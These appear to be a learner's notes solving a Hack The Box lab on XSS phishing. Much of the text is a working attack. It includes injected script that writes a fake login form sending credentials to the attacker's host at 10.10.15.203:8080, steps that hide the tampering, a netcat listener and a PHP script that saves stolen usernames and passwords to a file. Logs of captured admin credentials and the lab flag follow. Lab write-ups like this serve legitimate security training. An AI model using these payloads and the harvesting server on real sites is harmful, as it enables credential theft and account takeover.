Phishing attacks usually utilize legitimate-looking information to trick the victims into sending their sensitive information to the attacker. A common form of XSS phishing attacks is through injecting fake login forms that send the login details to the attacker's server, which may then be used to log in on behalf of the victim and gain control over their account and sensitive information
IDENTIFY XSS VULNERABILITY
#perform code reviewroot@oco:~$BROWSER>{targetSite:port}>CTRL+U*reviewtheHTMLsourceandidentifyparameters*alsoreviewthe.jsfile#perform a test to see where the input is being storedroot@oco:~$BROWSER>{targetSite:port}inputfield:testroot@oco:~$BROWSER>{targetSite:port}>CTRL+U*<imgsrc='test'>#perform xss vulnerability testroot@oco:~$BROWSER>{targetSite:port}inputfield:<script>alert(window.origin)</script>#create the correct payloadroot@oco:~$'><script>alert(window.origin)</script> * the single quote & the greater than symbol together '>closesthesrcattributeandtheimgtag<imgsrc=''>.sincethiselementisnowclosed,theoriginalmember'> will now be moved to the back of the ending </script> tag - <img src=''><script>alert(window.origin)</script>'>
root@oco:~$ ip address show
* 10.10.15.203
#prepare HTML code locally to see how it'll look
root@oco:~$ nano xssPhishing
<h3>Please login to continue</h3>
<form action=http://10.10.15.203>
<input type="username" name="username" placeholder="Username">
<input type="password" name="password" placeholder="Password">
<input type="submit" name="submit" value="Login">
</form>
#minify
root@oco:~$ BROWSER > https://www.toptal.com/developers/html-minifier
input: ...HTML code...
output: ...minified HTML code...
#inject
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>
* must inject an HTML code that displays a login form on the targeted page
* this form should send the login information to a server we are listening on, such
that once a user attempts to log in, we'd get their credentials
* arbitrary port number 8080 is required in case regular port 80 is already in use
#cleanup - remove unnecessary items on the page to make it look legitimate
root@oco:~$ BROWSER > CTRL + SHIFT + C
* this opens the page inspector picker
- click on the element that must be removed
- the image url field in the example
- urlform is the target
- additional payload is now document.getElementById('urlform').remove();
- this must be put behind the document.write() function
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script>
* arbitrary port number 8080 is required in case regular port 80 is already in use
#clean up the code to remove any signs of tampering
#this removes any original HTML code left over by commenting it
root@oco:~$ BROWSER > {targetSite:port}
input field: '><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.203:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
* arbitrary port number 8080 is required in case regular port 80 is already in use
root@oco:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.15.203] from (UNKNOWN) [10.10.15.203] 41330
GET /?username=username&password=password&submit=Login HTTP/1.1
Host: 10.10.15.203:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.129.141.202/
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
* the nc cmd above will close after handling a single connection
to accept multiple connections, you can use a loop in a while statement in Bash
- see below code for multi connection implementation
root@oco:~$ while true; do
echo "Connection received at $(date)" >> connections.log
sudo nc -nlvp 8080
done
* this will restart nc each time a connection closes, essentially creating a
simple, persistent listener that accepts multiple connections sequentially
additionally, this has logging implemented that log connection times and
IP addresses
* netcat doesn't handle HTTP request correctly, so this is only a sample
- use a PHP listening server instead to capture and to make it look like
the victims successfully logged in after logging in with their credentials
root@oco:~$ mkdir -p /tmp/tmpserver
root@oco:~$ cd /tmp/tmpserver
root@oco:~$ nano /tmp/tmpserver/index.php #at this step we wrote our index.php file
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
$file = fopen("creds.txt", "a+");
fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
header("Location: http://10.10.15.203:8080/phishing/index.php");
fclose($file);
exit();
}
?>
root@oco:~$ sudo php -S 0.0.0.0:8080
PHP 7.4.15 Development Server (http://0.0.0.0:8080) started
[Mon Nov 4 20:11:33 2024] PHP 8.2.24 Development Server (http://0.0.0.0:8081) started
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 Accepted
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 [302]: GET /?username=admin&password=p1zd0nt57341myp455&submit=Login
[Mon Nov 4 20:18:46 2024] 10.129.116.103:46910 Closing
#
root@oco:~$ BROWSER > {targetSite:port}/phishing/index.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/send.php
root@oco:~$ BROWSER > {targetSite:port}/phishing/login.php
* admin:p1zd0nt57341myp455
* HTB{r3f13c73d_cr3d5_84ck_2_m3}
